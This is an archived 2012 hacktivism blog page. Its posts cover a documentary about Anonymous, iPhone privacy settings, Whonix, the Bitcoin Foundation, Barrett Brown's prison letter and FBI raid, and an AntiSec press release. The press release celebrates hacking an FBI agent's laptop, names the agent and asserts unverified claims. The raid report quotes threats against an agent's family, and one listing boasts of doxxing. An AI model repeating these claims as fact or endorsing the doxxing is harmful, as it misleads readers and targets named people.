Anonymous – Documentary ”We Are Legion” Peels Back Hacktivist Group’s History

Oct 24, 2012 | Anonymous, Video

http://youtu.be/-_aWLu58Y1U

New documentary We Are Legion puts an actual human face on Anonymous, the hacktivist group whose members usually are seen wearing Guy Fawkes masks — if they are seen at all.

Considering Anonymous’ retaliatory acts against websites run by the Department of Justice and the entertainment industry just last week in response to the government takedown of file-sharing site Megaupload, We Are Legion: The Story of the Hacktivists could almost be mistaken for a 93-minute news segment.

But unlike most news segments about the group, the documentary contains genuine moments with actual Anons (some maintain their anonymity in the doc, but others don’t).

“The last two or three days we’ve seen a lot of what Anonymous does,” We Are Legion director Brian Knappenberger said in an interview with Wired.com here Saturday, the morning after the documentary’s premiere at the Slamdance Film Festival. “You know, there was a film about the Weather Underground that came out a few years ago, and that was made 30 years after they were blowing up buildings, and I love that film. But picture making a film like that while they were still blowing up buildings — that’s what I’m talking about.”

We Are Legion might be the first to portray the group’s members as true revolutionaries, and it could serve as a time capsule if the kind of online sit-ins and retaliatory strikes that Anonymous has helped create become the new model for civil disobedience across the globe.

For those who didn’t hear of Anonymous until Occupy Wall Street started up, We Are Legion effectively puts the group’s current incarnation in historical perspective. The documentary traces the roots of early hacker-activist groups like the Cult of the Dead Cow and Electronic Disturbance Theater before jumping into Anonymous’ roots in 4chan.

The documentary goes deep. Speaking with current and former Anonymous participants — as well as Wired writers Ryan Singel and Steven Levy — Knappenberger gives a thorough chronological account of Anonymous’ exploits, up to the group’s current place at the forefront of online disobedience.

Starting with Mercedes Renee Haefer, who was arrested in conjunction with the denial-of-service attacks against online payment service PayPal last July, the documentary talks to Anons and experts about Anonymous’ vendetta against Scientology, defense of WikiLeaks, and support of the actions in Tunisia and Egypt during the Arab Spring.

Slamdance, the underground alternative movie fest that runs during the Sundance Film Festival here each year, seems like the perfect place for We Are Legion’s primer on Anonymous. The film might have seemed out of place at a glitzy Hollywood-in-the-hills screening.

“It feels right,” Knappenberger said of the premiere. “Slamdance has a kind of undercurrent of revolutionary, counterculture, slightly anarchic vibe that just seemed to fit [the film] right away.”

Knappenberger is looking for distribution for his film so it can be seen by a wider audience. It seems possible that Hollywood backers will shy away from a film about Anonymous after the group’s actions against the Motion Picture Association of America and other entertainment industry power players. But Knappenberger said he isn’t worried.

“I just want to tell the story,” he said, adding that considering Anonymous’ various targets over the years, “Who aren’t I offending?”

He could also take advice from his subject Haefer, who in the film says that what Anonymous ultimately hopes to protect is freedom of speech, regardless of a person’s opinions or background.

Or, as she says simply, “Your opinion matters.”

via TellMeSpud

October 23, 2012 – DCMX Radio: Anonymous Part 1 – Quck History Timeline, Protection from FBI Manipulation, Anon Updates, Decrypting The Matrix

Oct 23, 2012 | Anonymous, DCMX Radio, News

Timeline History of Anonymous Activism

Protect Yourself from FBI Manipulation (w/attorney Harvey Silverglate)

Outing of Amanda Todd Bullies!! DOX’d by Anonymous!

Anon Action Groups, PLF, Par:AnoIA, AnonOps

Decrypting the Matrix Statement

Every Week Night 12-1am EST (9-10pm PST)

– Click Image to Listen LIVE –

iPhone Privacy: How To Stop Apple And Advertisers From Tracking You On iOS 6

Oct 22, 2012 | Anonymous

Your iPhone, I’m sad to say, is not like Las Vegas: What happens there often does not stay there.

Much of your iPhone activity — including your web browsing, app store downloads and more — is transmitted to advertisers through various channels so that they can serve up relevant advertisements and offers for you. Although these services have mechanisms in place to ensure that you can’t be identified, you still might be a little uneasy about all of that information getting sent off to unclear dimensions (regardless of whether you’re doing anything — ahem — naughty on your iPhone).

Luckily for you and your privacy concerns, Apple has provided users with several ways, especially on iOS 6, to limit the amount of information that gets transmitted to third parties. Unluckily, they are buried deep within the bowels of the iPhone, opaquely worded, and not located where you might think they are.

Consider this, then, to be your privacy itinerary. Here are three settings you should tweak if you want to limit the activity tracking that occurs by default on your iPhone. While the settings won’t completely eliminate the transmission of your iPhone data to often-mysterious parties, they will greatly reduce it.

1. Limit Ad Tracking

The subject of a brief controversy stirred up by Business Insider, Apple recently changed the way it identifies your device, starting with iOS 6, for advertisers that serve you well-aimed ads. To which you might reasonably reply: “Wait a minute — Apple is identifying my advice for advertisers so that they can serve me well-aimed ads?!?!”

Welcome to 2012, where pretty much everything with a battery is tracking you, and every site that prompts you to enter a login and password is trying to provide you with relevant ads.

Though Apple insists the Advertising Identifier is non-permanent and cannot be used to determine your identity — and by all indications, the new system is far better than the old one, which really did identify you to an odd extent — it still allows you to opt out of the program. To do so, go into Settings, then General, then About, then Advertising. You want to turn Limit Ad Tracking to the “On” position.

(Which is a little confusing, by the way: In order to turn ad tracking off, you have to flick the switch to “On”? How about, next time, if you want to shut something off, you select “Off”? If I want to mute my phone, I don’t have to switch “Turn Volume Off” to the “On” position, do I? Who’s on first?)

No matter: Turn “Limit Ad Tracking” on. You will still see ads on your phone, but they won’t be “targeted” to you based on your activity.

2. Opt Out Of Targeted iAds

To more thoroughly block targeted ads, you can specifically prevent Apple’s own iAd system from tracking your behavior and presenting ads based on that activity.

To do so, open Safari on your iPhone and visit http://oo.apple.com. There you’ll see a screen asking if you want to opt out of Interest Based iAds. If you flip the switch to “Off,” the ads you see will not be based on your history. Instead, they will be general, non-targeted advertisements. (See? Flip the switch to “Off” when you want to turn something off. How hard was that?)

And, as our friends at TUAW helpfully point out, this is not a final decision: If you find yourself yearning for targeted ads, you can bring them back any time you please, by clicking to the site above and turning them back on. Thomas Wolfe was wrong: You can go home again! (If by “home” you mean “digital advertisements conjured by an automated analysis of your smartphone activity.”)

While you’re tweaking your iAds, you might also shut off location-based iAds, or advertisements based on your current location. Go into Settings, then Privacy, then Location Services, then System Settings (at the bottom), then switch “Location-Based iAds” to the “Off” position.

3. Do Not Track

With the Safari browser in iOS 6, Apple also introduces a “Do Not Track” feature, which denies websites you visit the ability to track you both on their page and on other websites you visit when you leave.

I know, I know, it’s a radical concept: Once you leave a website, that website no longer tracks your behavior. It’s like, when I leave my friend’s apartment, do I expect him to secretly embed a spy camera on my backpack so that he can keep an eye on my every movement outside of his home?

Well, maybe. There’s no “Off” switch for my creepy friend William.

Unlike William’s creepiness, however, there is an “Off” switch for website tracking! To enable Do Not Track on your iPhone, you need to turn on “Private Browsing.” Open up Settings, and then go into the Settings for Safari. Switch Private Browsing to “On” and your phone will start sending a Do Not Track message to any website you visit.

You can learn more about the Do Not Track movement by visiting the official website (which will also tell you whether you have Do Not Track enabled on your browser).
These three tips should put your mind at ease about the extent to which your iPhone behavior is being tracked. Again, it’s not a wholesale solution to your iPhone-tracking concerns, but it will greatly reduce the more suspect, easily-preventable data-collecting activity.

Now, if you’ll excuse me, I have to go check my backpack for spy cameras.

via HuffPo

Whonix: The Anonymous Operating System

Oct 13, 2012 | Anonymous, Survivalism

Whonix is an anonymous general purpose operating system based on Virtual Box, Ubuntu GNU/Linux and Tor. By Whonix design, IP and DNS leaks are impossible. Not even malware with root rights can find out the user’s real IP/location.

Whonix consists of two machines, which are connected through an isolated network. One machine acts as the client or Whonix-Workstation, the other as a proxy or Whonix-Gateway, which will route all of the Whonix-Workstation’s traffic through Tor. This setup can be implemented either through virtualization and/or Physical Isolation.

Whonix advantages:

All applications, including those, which do not support proxy settings, will automatically be routed through Tor.
Installation of any software package possible.
Safe hosting of Hidden services possible.
Protection against side channel attacks, no IP or DNS leaks possible^3^ To test for leaks, see LeakTests.
Advantage over Live CD’s: Tor’s data directory is still available after reboot, due to persistent storage. Tor requires persistent storage to save it’s Entry Guards.
Java / JavaScript / flash / Browser Plugins / misconfigured applications cannot leak your real external IP.
Whonix does even protect against root exploits (Malware with root rights) on the Workstation.
Uses only Free Software.
Building Whonix from source is easy.
Tor+Vidalia and Tor Browser are not running inside the same machine. That means that for example an exploit in the browser can’t affect the integrity of the Tor process.
It is possible to use Whonix setup in conjunction with VPNs, ssh and other proxies. But see Tor plus VPN/proxies Warning. Everything possible, as first chain or last chain, or both.
Loads of Optional Configurations (additional features / Add-Ons) available.
Best possible Protocol-Leak-Protection and Fingerprinting-Protection.

Can the Bitcoin Foundation Build Legitimacy For an Outlaw Currency?

Oct 2, 2012 | Anonymous, News

Bitcoin may have just gotten an upgrade.

Bitcoin Gavin Andresen announced today on the Bitcoin Talk forums that he has launched a non-profit, modeled on the Linux Foundation, that will seek to “help people exchange resources and ideas [about Bitcoin] more freely.”

If you’re unfamiliar with the Linux Foundation, it’s a non-profit aimed at promoting the growth and advancement of Linux, an open-source operating system. David Perry, author of Coding in My Sleep, describes the foundation as:

A non-profit entity explicitly designed to help Linux succeed. It does this by acting as a neutral spokesperson, building networks of Linux users and developers, promoting the use of standards to make developers’ lives easier and so on. They also sponsor a number of key developers financially, turning what would otherwise be a hobby into an actual pays-the-bills job, thus allowing the developers to remain independent and work full time on improving Linux.

Mr. Andresen has similar hopes for the Bitcoin Foundation, which will help to standardize and fund Bitcoin infrastructure, keep the currency secure, and work to correct false interpretations and misinformation about Bitcoin. Bitcoin developers and aficionados can pay for membership status, which ranges from a 2.5BTC annual membership (about $30, according to Preev) all the way up to 10,000BTC/year (about $123,000–which, whoa).

“I think Linux is a great ‘role model’ for Bitcoin,” he wrote in the announcement. “It is a very successful open source project that really embraced the notion of ‘open,’ encouraging the use of the core technology for a wide range of applications. I hope that the Bitcoin Foundation will help do the same for Bitcoin.”

Of course, the Linux Foundation is about promoting an operating system that only accounts for 1.55% of the OS market share, whereas the Bitcoin Foundation will work to promote a cryptocurrency sometimes used for blackmarket activity. Bitcoin has seen its own share of PR nightmares in recent months, from an exchange-paralyzing heist to talk of Bitcoin ponzi schemes. Perhaps the Bitcoin Foundation is just what the currency needs to clean up its image.

The Foundation itself even plainly states the need for an organization that can help break Bitcoin out of its cyberdungeon:

As the Bitcoin economy has evolved, we have all noticed barriers to its widespread adoption—botnets that attempt to undermine the network, hackers that threaten wallets, and an undeserved reputation stirred by ignorance and inaccurate reporting.

To us, it became clear that something had to be done. We see this foundation as critical for bringing legitimacy to the Bitcoin currency. Only then can we increase its adoption and positive impact on the world’s finance.

The Bitcoin Foundation has stacked its board with well-known, high-profile people active in the Bitcoin community so that users feel safe donating. Still, as Mr. Perry points out, “according to the dissenting voices, it’s representative only of the ‘big business’ side of Bitcoin, not the actual users.” Indeed, some users have expressed dissent on the boards, but for the most part they seem supportive of a unified effort to legitimize Bitcoin.

Plus, Mr. Andresen stresses that these decisions aren’t set in stone.

“The structure of the Foundation can be changed by a vote of its members,” he wrote, “and exactly what the Foundation does will largely depend on who is willing to step up do the work to make things happen.”

via BetaBeat

Barrett Brown – Communiqué from Prison 9/20/12

Sep 28, 2012 | Anonymous, Government Agenda

It is hard for me to express how much I appreciate your letter, which is the first I have received here, along with the support I’ve reportedly gotten from others so far. Before I forget, let me request that you also send a tweet of support to Jenna, @ElviraXMontana on Twitter; as my girlfriend, she had to watch as the FBI crushed my ribs (which I believe will be healed in time even if I’ve had trouble acquiring medical attention due to me under Geneva; put in formal request for X-ray last night here at Mansfield, whereas last week at Lew Sterrett I was sent to medic by an officer Tamer before being instead re-directed to what is intended as a temporary holding cell for those about to be released on bond, this change of plan being instigated by an officer Roeun (sic?) whom I have since reported to the proper authorities. Despite my having explained her mistake politely twice over the course of the next seven hours, and despite my condition having been serious enough to have prompted other inmates to suggest I check for internal bleeding, I was screamed at and then later simply ordered to lay down, all of which was witnessed by two other inmates, one of whom promised to inform Tim Rogers of D Magazine that I was potentially dying and needed intervention ASAP as soon as he himself was released a few minutes hence (again, this was the temporary outgoing holding cell, not meant for housing inmates for anything longer than an hour or so as their bond is processed; as such, I was not fed, either, much less given my medication, suboxone. Note that none of the treatment I received at Lou Sterrit had anything to do with who I am or what I am accused of, – it is simply the natural result of the inhumane and degenerate mentality found within the Texas “corrections” system, something I first described in a 2005 article for Towards Freedom. It is something we will have to address more firmly over the coming years, just as we have addressed North Africa and the intelligence contracting industry since late 2010. And I note all of this not merely to complain—although to complain is among the few vices I have been left aside from bragging to my fellow inmates – but to illustrate the fundamental problem that so many of us have sacrificed or risked to combat. This problem, which even Richard Nixon recognized and spoke about on that famed evening at the Lincoln Memorial, is that a republic built with the blood of giants has since become a “wild animal.” – one that now feeds upon us all.

I try to avoid metaphors, which can illuminate but in practice are too often used to obscure. Like many aspects of language, the false metaphor kills and enslaves. And at any rate, there will be time to discuss these broader issues later. For now, I must ask you to publish this on pastebin, Anonpaste, piratepad.de, and all other available venues, and that you also send it to some of the journalists that have been kind enough to follow my work as well as the consequences thereof, particularly my friend Michael Hastings, Barry Eisler, Michael Riley (Bloomberg), Ryan Gallagher (Guardian), and Josh at Daily Caller (forgot his last name) – plus the former editor of The Yemen Times who’s now at Global Times or some such and who, along with a certain Washington Times correspondent known to Gregg Housh, plus one or two others that I know of, who are now looking into Romas/COIN due in part to my release of the NYT e-mails earlier this month. Along with others in both the mainstream and independent media, these are most likely to report accurately on this matter. Having been mischaracterized at least a hundred times by “professional” journalists since I first appeared on Fox News in January 2009 to denounce Obama’s association with the goofy fascist Rick Warren – and was introduced as being spokesman for the non-existent “American Atheist Society” rather than GAMPAC. This would be a good time to note, particularly for the benefit of certain journalists, that I am not and never have been the spokesman for Anonymous, nor its “public face” or, worse, “self-proclaimed” “face” or “spokesperson” or “leader” (as the CIA-funded Radio Free Europe called me last year when I felt compelled to “quit” the non-group that I’d never technically joined in the first place, but rather gradually attached myself to as Wikileaks and Tunisia went down in December of 2010). Anyone who cares to learn what happens to a person who decides to help deal with such issues at the request and with the knowledge of active Anons can search my name in conjunction with those terms, and then see the article “Barrett Brown is Anonymous” from April 2011 in which I explain clearly, as I have countless times since, that no one has the authority to designate me as such. It is known to some of those who worked out of Anonops or were otherwise particularly active in the beginning of 2011 that I wrote or edited a number of the press releases of that time, and that the al-Jazeera article written in the first few days of January and which appeared later that month under the title “Anonymous and the Global Correction” was also my work – something I revealed privately to the brilliant cyberpunk essayist Bruce Sterling after he openly speculated as to the author’s background in Wired, noting the sentiments to be that of a true revolutionary. Among those who now agree with him are the FBI, which has since responded accordingly – and unethically.

Contrary to the countless claims to the effect that I hold some official role in Anonymous, I can think of only one occasion in which any Anon has come close to actually deeming me as such, that being the day on which HBGary was hacked in retaliation for HBGary Federal CEO Aaron Baar’s claim – shown to be entirely false – that he had identified Anon’s “lieutenants” and “co-founder” and that he had been contacted by the FBI about this. In fact, he had conflated three different people including a professional gardener and, as shown in the notes Anon released along with the e-mails taken from HBGary Federal, had made a huge number of additional mistakes – something since confirmed by everyone concerned including Barr himself. (That the Financial Times writer who had bought Barr’s self-promotion would again essay to write about Anonymous months later, this time taking the claims of a Dutch kid at face value in the course of “reporting” various negative things about how the movement operates, is only one of numerous bizarre and depressing twists to this story; I myself would later encounter him on Canada television as a panelist during a discussion in which he accused Anon of being particularly anti-“American interest”, to which I responded that it is difficult to avoid stepping on the empire’s toes when one assists North Africans in fighting off dictatorships that the US has supported for years.) (Oh snap!) On that day, as recorded on pastebin from the discussion on the #OPHBGary channel at Anonops, I was referred to in passing as “our public face” to a journalist. I was on the phone to HBGary President Penny Hoglund at the time, apologizing that HBGary’s e-mails had been seized by Sabu in addition to HBGary Federal’s, instructing her on how to get on IRC in order to make her case directly to the hackers, and promising to remove the link I had put up to the 70,000 e-mails acquired in the operation, a link I had placed upon a Daily Kos post put up to explain the situation to the great many who would miss the “makeover” done to HBGary.com. Had I known that Penny was lying to me about what she and husband Greg Hoglund had known about Barr’s irresponsible attempt to save his own career at the expense of the innocent and heroic alike, I would have simply hung up. Instead, I was polite – but I recorded the call, just as I recorded the next call with Barr, the next call with HBGary exec Jim Butterworth, and finally the drunken call I received months later from Greg Hoglund himself. “Trust but verify,” as Reagan said in the context of a different set of villains.

With the exception of the ten minute convo I released between myself and Aaron Barr, all of the other recordings – and plenty of others – are in the possession of the FBI, which raided my apartment as well as my mother’s home on March 6th. For more on those events, as well as the criminal conspiracy to which I have been subjected by elements of the FBI, HBGary, and paid informant/contractor Jennifer Emick (among other parties both known and undiscovered), please see the last 3 videos I uploaded to my YouTube account, as well as documents I linked to on my Twitter account @BarrettBrownLOL in the final days before my most recent (and dramatic!) arrest. Not everything is released; I was interrupted by armed, mediocre federal agents and DPD officers (“No complicity in assassination of a chief executive since 1963!”) before I could finish making my case, which was to be done over several days before the entirety would be sent to the FBI and the judge who signed my March search warrant. This was to be followed by the instigation of a civil suit against HBGary and other parties to be named in the next 2 months. My plan has been disrupted – plans often are, as history tells us – but it has not been rendered obsolete. It will evolve, just as ProjectPM itself has evolved steadily since 2009, when this war became evident to me, when I first realized that my future as a political satirist would have to be abandoned in favor of this dirty, grueling struggle.
But why was I arrested this time? I would love to tell you. But the prosecution wouldn’t like that. I, and everyone else in the court room, were ordered to refrain from discussing the complaint, affidavits, and warrant, all of which are sealed at the request of the author, one FBI special agent whom I shall not name lest I give him cause for fright (or pretend fright – I am allegedly a danger to one especially skittish special agent whom I shall be careful not to name again until such time as I am prepared to list him in the civil suit I’ve been preparing for weeks now). Frankly, I do not blame this other special agent for requesting that the document be sealed – if I had written something of such low quality and demonstrable untruth, I would burn it and ask forgiveness of every deity invented by man and the higher apes/dolphins/whales. Likewise, if I were the US attorney who signed the Motion for Detention dated September 13 2012 – the document that, after having been approved by Judge Paul D. Stickney, ensured I would not only be prevented from discussing what I’m being accused of but also made a prisoner of the state until such time as a trial or some such can be concocted out of the jurisprudential magick I struggle to follow, in my innocence. Apparently I am not just a danger to the fragile FBI agents who have taken to threatening my mother and fracturing my ribs in the course of heavily-armed raids on my uptown Dallas apartment, but must be prevented from explaining to my associates, followers, and even enemies why I have again been subjected to violence and indignity.

I explained the first raid against me (March 6th, 6:30 a.m. CST) and the second against my mother (about six hours later) in several pastebin messages at that time. It was not until 2 months ago that I learned how a judge had been tricked into permitting this raid on me – how the disgraced contracting firm HBGary hired the paid FBI informant Jennifer Emick to, in their words, “find something to get [me] picked up on,” even as this bizarre former Anon made public accusations against me under both her real name and her adopted contractor persona: “FakeGreggHoush” on Twitter (now “AsherahResearch”) and Asherah on IRC – particularly the 2600 server where she frequented the #jester channel alongside various ex-military men and current “security’ contractors who all found themselves inclined to associate with the admitted criminal hacker th3J35T3R, one of several parties who have taken credit for DoS attacks on Wikileaks. I should not have to remind anyone that 40 U.S. homes were raided in January 2011 due to a similar but less effective series of DDoS attacks on Visa, MasterCard, PayPal, and Amazon which were clearly an act of protest against an unprecedented economic blockade ordered by the U.S. regime. 14 of the “criminals” in question are being charged such that they face up to 15 years in prison. Thanks largely to Jay Leiderman the California attorney and John Penley the NYC activist and veteran, many of them are being represented for free. Likewise, I will seek and accept only pro bono assistance from this point on, though with the stipulation that I will pay any such lawyers what I can from the defense funds that have been set up for me thus far by well-wishers. As of this writing I dismiss Tom Mills, whom I retained for $3,500 after receiving bad advice from a well-meaning person. I will also expect that money returned within 60 days of the publication of this missive online (ProjectPM participants, please ensure that he receives this message, which I have also delivered through my mother – whom he falsely claimed to be representing on the matter of the FBI threats against her despite having been paid by me, not her). And as I had noted both publicly and privately earlier this month, I am still seeking additional attorneys with skill in civil litigation to pursue at least two suits I’ll be filing by the end of the year. Those interested may write to me at my new home, Some Jail in Texas. I am able to arrange for phone conversations with any applicants (or anyone else who is either especially interesting or who is able to accept a collect call or contribute $5 to my commissary/phone fund, that being the cost of a 15-minute call instigated by me). Anyone who writes me without us having been formerly introduced, I will guarantee a response if you send self-addressed stamped envelope. Also I believe that only mail with a return address will be delivered to me, though I’m not sure.

I hate that I have spent so much time in conflict over the past two years, and that so much of this has involved my fellow American citizens rather than the Middle Eastern dictators that I got involved in this to combat. I feel sorrow at the lost opportunities, and as for the way it has changed me as a person… I like to think that I am wiser and less naïve than I was, but I know too well how foolish and unsophisticated I was to begin with. I cannot excuse the mistakes I myself have made on both the strategic and tactical levels in my short career. I shudder when I look back on some of the things I wrote or said when I got my first real taste of power at the dawn of 2011, and I continue to bring shame upon myself and upon my family and work by some of the things I say even lately. In particular I have made comments about the U.S. military that I do not mean and which are obviously not entirely accurate. Along with other nonsense I have said, felt, written throughout my life, many of these things originate from my own fears and weaknesses. I am humiliated at not being able to protect my own mother from the FBI, or to shield my own girlfriend from watching heavily-armed men step on my spine as I scream in pain. I cannot forget how my mom cried on March 6th after the FBI had left with my equipment and hers, and how she whispered through tears that she wanted to be able to protect me from prison but couldn’t; I will never forget the look on Jenna’s face as the federal thugs swept through my efficiency apartment with guns drawn and safeties off, in search of hidden assailants and non-existent weapons. That these things are unjust and increasingly insane does not change the fact that they are the result of my own behavior, my own miscalculations, my own choices.

Having said that, I regret nothing. For the last week I was denied opiates and thus forced to feel not just rage, hatred, all the primal things, but forced to endure them while sicker than most humans can imagine and in a jail that is overcrowded and filled with common criminals. I have gained something extraordinary in that process, which ended this morning when I was given the first of 30 days of suboxone. I will personally thank everyone on the outside who has helped me and this movement particularly at this critical time, when I have regained the freedom that I did nothing to lose. For now, and until that time, it is war, on paper as always, but war.

Barrett Brown
Founder
ProjectPM
Prisoner #35047177
Mansfield Law Enforcement Center
1601 Heritage Parkway
Mansfield, TX 76063

Postscript-
[redacted], if you are able to relay this message to the Anons, my ProjectPM people, journalists, etc, you will have done me a finer deed than most men ever have occasion to do for another. I am transmitting a copy of this to another individual to ensure that the FBI does not manage to silence me on this (incidentally, the local jail here in Mansfield has proven to be run by honorable, trustworthy, even friendly people, but it is nonetheless subject to the Yankee boot (no offense)). Tell journalists, etc that they may contact [redacted]. My future and that of ProjectPM depends on you and a handful of others. Thank you for your loyalty at this time. Finally, please include this PS when forwarding and ask people to see my original search warrant as published on Buzzfeed a few months back. Echelon2.org is part of the key to this affair, but not all. More to be revealed when all is prepared. Good luck to you.

Activist Barrett Brown Raided by FBI During Online Video Chat

Sep 13, 2012 | Anonymous, News, Video

http://youtu.be/eky-q9CE_co

For the second time this year, self-proclaimed Anonymous spokesman Barrett Brown was raided by the FBI.

The latest dramatic incident occurred late Wednesday evening while Brown and another woman identified by some as his girlfriend were participating in an online chat on TinyChat with other individuals.

Two minutes into the recorded chat session, loud voices could be heard in the background of Brown’s residence in Texas while the woman in the room with him was in front of the computer screen. She quickly closed the computer screen, but the audio continued to capture events in the room as the FBI appeared to strong-arm Brown to put handcuffs on him. Brown could be heard yelling in the background.

A spokeswoman in the Dallas County sherriff’s office confirmed to Wired that Brown was raided last night and was booked into the county jail around 11 p.m. She said the FBI removed him from the jail this morning to take him to a different facility, but she did not know where he was headed.

California attorney Jay Leiderman, a member of Brown’s legal team, told Wired that Brown was scheduled to be arraigned today in Texas on making threats to a federal agent.

Asked if the FBI agents were aware that Brown was online at the time of their raid, Leiderman said, “They problaby would have preferred to raid him when he was not online.” He noted that the audio from the raid was “certainly less than flattering when they’re marching through these doors dropping F-bombs…. I imagine they would not want to have that captured if they could help it.”

A transcript of the TinyChat session has been posted online. Just moments before the arrest, there were jokes about whether one of the chat participants was real or just an animated GIF. Moments later, the chat participants faced a different conundrum: trying to figure out whether they’d just witnessed an FBI raid.

A voice that appeared to come from one of the arresting agents was heard saying something to the effect: “You’re going down! Get your hands down!”

Right as the noise began, another participant in the chat room showed up in a video window with a white handkerchief covering his lower face. “Is Barrett Browm getting fuckin’ raided by the FBI?” he appeared to say. “Holy shit!”

Brown’s latest raid came after he posted a long and rambling YouTube video in which he talked about taking drugs (though not today, he noted) and about retaliating against an FBI Agent named Robert Smith after he learned that his mother might be hit with obstruction of justice charges. The threat of charges was apparently related to a laptop of Brown’s that he apparently hid.

“So that’s why Robert Smith’s life is over,” Brown said in the video (beginning around minute 9:40). “When I say his life is over, I’m not saying I’m going to kill him, but I am going to ruin his life and look into his fucking kids. Because Aaron Barr did the same thing and he didn’t get raided for it. How do you like them apples?” he said, smiling.

The video, titled “Why I’m Going to Destroy FBI Agent Robert Smith Part Three: Revenge of the Lithe” was accompanied by a note apparently posted by Brown that reads: “Send all info on Agent Robert Smith to [email protected] so FBI can watch me look up his kids. It’s all legal, folks, Palantir chief counsel Matt Long already signed off on it when Themis planned worse.”

Brown also talked about being a target of the Zeta drug cartel and mentioned that he was heavily armed and was concerned that the cartel would come after him posed as federal officers.

“Any armed official of the U.S. government, particularly the FBI, will be regarded as potential Zeta assassin squads,” he said in the video. “As FBI knows … they know that I’m armed and I come from a military family and I was taught to shoot by a Vietnam veteran … and I will shoot all of them and kill them if they come and do anything…. I have reason to fear for my life.”

He signed off the video saying: “Frankly, it was pretty obvious I was going to be dead before I was 40 or so, so I wouldn’t mind going out with two FBI sidearms like a fucking Egyptian pharaoh. Adios.”

Asked about Brown’s comments, Leiderman said that he hadn’t seen the full video and wasn’t aware of everything Brown had said, but he noted that his client had a reputation for hyperbole and joking around, and that things he said might appear to be a threat when they weren’t really intended to be that way.

“It’s hard to understand the context [of what he said], Leiderman said. “But this is speech, so ordinarily we go to a First Amendment defense, but obviously there are lines that can be crossed where you can lose your First Amendment protection.”

An FBI spokeswoman had no comment to make on Brown’s arrest.

SOURCE: Wired.com

Anonymous Press Release – The Recent Hack Of The FBI Cyber-Crime Division

Sep 11, 2012 | Anonymous

Greetings World — On September 3, 2012 our comrades in AntiSec released a Press Release here –> http://pastebin.com/nfVT7b0Z

In this release they disclosed the fact that they had hacked the laptop of an FBI agent in the Cyber-Crime division and among the booty taken was a file containing 12 million UDIDs from various Apple products owned by people in the USA. They released evidence of this in the form of 1 million partially redacted entries from the file. The media did their usual idiot dance, latched onto the story and ran without thinking. Then mid-week it was pointed out by their critics that Anonymous could have got that file from many sources. Of course the FBI denied they were hacked, did you honestly think that the FBI Cyber-Crime guys would be like yeah Anonymous hacked us and we are butthurt? Please. Then no sooner does the media turn to this idea that hey, Anonymous could have got this info from some app developer lo and behold an app developer mysteriously discovers that they have been hacked and the data belongs to them. Yeah right. And now the media has come full circle like baying dogs and is reporting this shit as the newest version of reality. Fucking jokers. We have strong reason to believe this company Blue Toad are liars. But even if their data matches the data set obtained from the FBI by AntiSec, this simply points to one possible source where the FBI might have obtained the data. As AntiSec themselves pointed out in their response to the FBI’s lies, no one ever said the FBI got this data from Apple.

http://pastie.org/4678441

Now that the main stream media is finally catching on that this so-called “Blue Toad” revelation proves nothing, everyone seems completely perplexed. Some tech journalists are demanding hard “proof”. Don’t be fools, that would land a bunch of us in prison and it ain’t going to happen. What AntiSec and Anonymous HAVE provided you is evidence that only has meaning to the FBI Cyber-Crime guys.

These partial IPs for instance:

206.112.75.XX
153.31.184.XX

Has any reporter asked the FBI Cyber-Crime division if these IPs have any meaning to them. No, of course not. They would only deny it or just not answer the question saying it was a “security issue”, right ? But it IS your job as a reporter to at least ask. In the initial Press Release, AntiSec provided the name of the Cyber Agent and the make and model of his laptop. “During the second week of March 2012, a Dell Vostro notebook, used by Supervisor Special Agent Christopher K. Stangl from FBI Regional Cyber Action Team and New York FBI Office Evidence Response Team was breached.” Has even ONE reporter contacted Agent Stangl and asked him what make and model laptop he uses for work? Uhmmm, no of course not. You are all so quick to believe some strange company who conveniently pops up out of the mists (and who we have never even heard of ourselves until today). But what is REALLY incredible is that you would believe a group who is historically PROVEN to be pathological liars and criminals, namely the FBI. AntiSec also provided the method used, and most security “experts” (i.e. White Hat Scum) have grudgingly admitted the hack would be possible using the technique described. AntiSec has even provided the MAC addresses of all the hardware used in the new York office of the Cyber-Crime Division:

http://twitter.yfrog.com/oboljfp

Has anyone asked the FBI if these MACS are real? And before you reply “they would just deny it or say no comment” – it is STILL your job as reporters to at least ASK and report their answer to your audience. You have asked for chat logs from the hack. AntiSec has indicated they may provide them after they have thoroughly scrutinized them and redacted shit that can get them V&ed, which will most likely include the forensic “proof” some of you crazy journos are clamoring for. But the bottom line is this. Anonymous and AntiSec have provided FAR more evidence for their side of the story than the FBI has with their two lousy tweets and then a steady stream of “no comments”. The FBI has not provided one shred of evidence for their lying denials. Anonymous and AntiSec have provided what they can, and may provide more in the future.

Here is the latest statement from AntiSec –> http://bit.ly/TQsCc3

AntiSec hacked the FBI and found 12 million UDIDs from Apple products on the laptop of a special cyber agent of the FBI. Whether the FBI had these for some tracking scenario as AntiSec opines, or whether they had them to use to crack open Apple stuff they seize when the “suspect” won’t give them the passwords – or whether they had them for some completely un-known nefarious reason, they had them and Anonymous took them. We know this is true, and more importantly the FBI knows this is true. It is not our job to convince either the media or the masses. But the truth is there, if the journalists want to actually WORK for a living and dig for it. Also, that file wasn’t all that AntiSec obtained from Agent Stangl’s laptop. The FBI and all you media journos should….

EXPECT US.

SINCERELY

— Anonymous Anonymous Global — www.AnonymousGlobal.tk

For Messages From AntiSec Follow @AnonymousIRC on Twitter

Make It Happen 2012: Second Transmission From ANONYMOUS

Sep 5, 2012 | Anonymous, Video

You can Make a Difference. Everyone Has An Opportunity To Affect Change During this Crucial Time on Earth.

Cryptoparty Goes Viral: Pen testers, Privacy Geeks Spread Security to the Masses

Sep 4, 2012 | Anonymous, News

Security professionals, geeks and hackers around the world are hosting a series of cryptography training sessions for the general public.

The ‘crytoparty’ sessions were born in Australia and kicked off last week in Sydney and Canberra along with two in the US and Germany.

Information security experts and privacy advocates of all political stripes have organised the causal gatherings to teach users how to use cryptography and anonymity tools including Tor, PGP and Cryptocat.

Multiple sessions were proposed in Melbourne, Sydney, Adelaide, Canberra, Perth and two in Queensland. A further 10 were organised across Europe, Asia, Hawaii and North America, while dozens of requests were placed for sessions in other states and countries.

The cryptoparties were born from a Twitter discussion late last month between security researchers and Sydney mum and privacy and online activist known by her handle Asher Wolf.

For Wolf, the sessions were a way to reignite technical discussions on cryptography.

“A lot of us missed out on Cypherpunk (an electronic technical mailing list) in the nineties, and we hope to create a new entry pathway into cryptography,” Wolf said.

“The Berlin party was taught by hardcore hackers while Sydney had a diverse range of people attending. The idea is to teach people who don’t crypto how to use it.”

The concept resonated with the online security and privacy community.

